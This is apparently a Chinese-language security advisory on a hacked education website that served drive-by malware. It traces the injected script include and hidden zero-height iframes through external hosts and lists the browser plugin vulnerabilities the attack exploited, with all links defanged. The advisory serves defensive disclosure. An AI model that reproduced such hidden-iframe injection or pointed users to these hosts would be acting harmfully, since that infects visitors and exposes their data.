东南教育网(hxxp://www.dnjyw.cn/)被黑客植入病毒,用户如果访问该网页,系统就会自动从恶意网站上下载并运行恶意程序。被感染病毒的用户系统可能被远程控制,盗取用户敏感信息。甚至导致死机。
该网站问题代码:
<script type="text/javascript" src="/include/js/common.js"></script>
hxxp://www.dnjyw.cn/include/js/common.js问题框架代码:
<SCRIPT language="JScript.Encode" src=hxxp://www.yiwucnc.com/member/css/js/js.js></script>
hxxp://www.yiwucnc.com/member/css/js/js.js问题框架代码:
<iframe src="hxxp://kdx.sxd65.cn/1/09/index.htm?08" width=100 height=0></Iframe>
hxxp://kdx.sxd65.cn/1/09/index.htm问题框架代码
<iframe src=index2.htm width=100 height=0></Iframe>
hxxp://kdx.sxd65.cn/1/09/index2.htm问题框架代码
<script src="js.css"></script>
hxxp://kdx.sxd65.cn/1/09/js.css问题框架代码
该挂马网页通过以下几个漏洞进行传播:
ActiveX控件漏洞
MS06-014漏洞
Adobe Flash Player SWF文件漏洞
Qvod Player漏洞
MS09-002漏洞
MS08-041漏洞
暴风影音2 mps.dll组件多个缓冲区溢出漏洞
Real Networks RealPlayer 'rmoc3260.dll' ActiveX控件内存破坏漏洞
RealPlayer播放器IERPCtl.IERPCtl.1漏洞
【注:基于安全考虑,所有网络链接“http”均已被替换为“hxxp”,特此说明。】
